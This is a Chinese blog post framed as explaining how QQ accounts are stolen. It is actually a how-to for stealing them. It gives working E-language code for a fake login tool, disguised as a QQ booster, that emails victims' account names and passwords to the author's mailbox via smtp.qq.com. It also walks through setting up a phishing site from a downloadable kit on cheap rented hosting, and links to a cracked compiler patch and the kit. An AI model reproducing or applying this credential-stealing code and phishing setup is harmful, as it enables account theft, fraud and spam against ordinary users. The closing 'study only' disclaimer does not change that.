最近发现很多朋友的QQ空间乱发信用卡、黄色等广告信息,严重的甚至在群发这些信息,当然知道这明显是账号被盗的一种现象,那么大家知道,我们的账号是什么情况下被盗的吗,今天我来给大家破解一下盗号的方法,让大家明白原来是这种情况我们的账号才被盗的!

QQ盗号

软件盗号

通常情况下,我们在第三方的软件上登陆了自己的QQ账号,软件后台可以直接收到你的账号和密码,利用机器批量登陆这些被盗的账号进行群发广告信息!

材料:

破解版易语言

一台能用的电脑

易语言5.3破解补丁:https://pan.baidu.com/s/1hqCpVWK

1、下载易语言用破解补丁破解,打开易语言新建一个Windows窗口程序。

QQ盗号

2、简单的做一下界面,这个界面看你伪装成什么软件,比如挂QQ软件,刷钻软件、点亮图片软件等等都可以,从而言之标题要吸引人。我这里给大家演示,就不作了。

QQ盗号

3、然后输入以下代码,这里注意了,红色部分是需要你填写的了。

.版本 2

.支持库 internet

.程序集 窗口程序集_启动窗口

.程序集变量 临时记录, 文本型

.子程序 _登录_被单击

.如果真 (账号.内容 = “”)

    信息框 (“请输入您的帐号!”, #错误图标, , )

    返回 ()

.如果真结束

.如果真 (密码.内容 = “”)

    信息框 (“请输入您的密码!”, #错误图标, , )

    返回 ()

.如果真结束

.如果真 (临时记录 ≠ 账号.内容)  ' 判断编辑框1 的内容是否改变

.如果真结束

.如果真 (连接发信服务器 (“smtp.qq.com”, 25, “你的QQ账号”, “你的QQ密码”, ) = 真)

    发送邮件 (“盗号成功”, “帐号:” + 账号.内容 + #换行符 + “密码:” + 密码.内容 + #换行符, “你的QQ邮箱”, , , “你的QQ邮箱”, )

    返回 ()

.如果真结束

信息框 (“连接失败了”, #错误图标, , )

QQ盗号

4、软件做好了以后,要打开邮箱的协议,这样才能够把账号密码发送到你的邮箱当中。登陆邮箱账号,点击设置-账户,把所有的服务都开启。

QQ盗号

5、如果你是QQ邮箱的话,需要设置QQ独立密码的。

QQ盗号

6、设置好独立密码后,咱们在易语言软件上面的QQ邮箱密码就是你邮箱的独立密码,这个时候咱们来测试一下,只要有人登陆了你这个软件,那么马上就会自动发送邮箱到你指定的邮箱当中。

QQ盗号

钓鱼网站

那么第二种情况就是我们经常看到的网站,你第三方网站上登陆自己的账号密码,从而被网站给记录,盗取你的QQ账号和密码,这也是非常常见的一种被盗途径。

1、下载钓鱼网站程序,这类程序百度一搜一大把免费的,为了减少大家不必要的时间,我这里给大家找到了一份,并且做了实验,表示可行。

下载地址:https://pan.baidu.com/s/1pLEUYqJ

2、下载程序之后,需要购买一个空间,淘宝上很多,可以购买最便宜的也就是几块钱的事情。使用ftp链接上去,把程序上传进去。

QQ盗号

3、把源码上传到空间的web目录,注意了,部分是www目录,具体可以问空间商,空间商会告诉你源码上传到哪个目录。

QQ盗号

4、网站的内容根据大家喜好而来,可以是点亮图标,也可以是送皮肤英雄等。这里作为演示,就简单的做一个页面。略懂html的可以发挥自己的想象了!

QQ盗号

5、那么要想自己领取到这些东西,就必须要登陆QQ号码,这里也给做出一个登陆的页面。当用户登陆以后,你的后台就记录了他们的数据。

QQ盗号

总结:本文仅供学习交流,禁止使用非法用途,另外这种方法不能盗取据为己有,因为现在QQ密保都非常好,就算告诉你密保了,你一样也盗不走的!

99%的人还阅读了:

解密QQ信封交易平台的暴利(权重1却可以月入万元)

揭秘租微信账号的红利(每月轻松入万元)

来源:,欢迎分享本文,转载请保留出处!(QQ/微信号:394062665)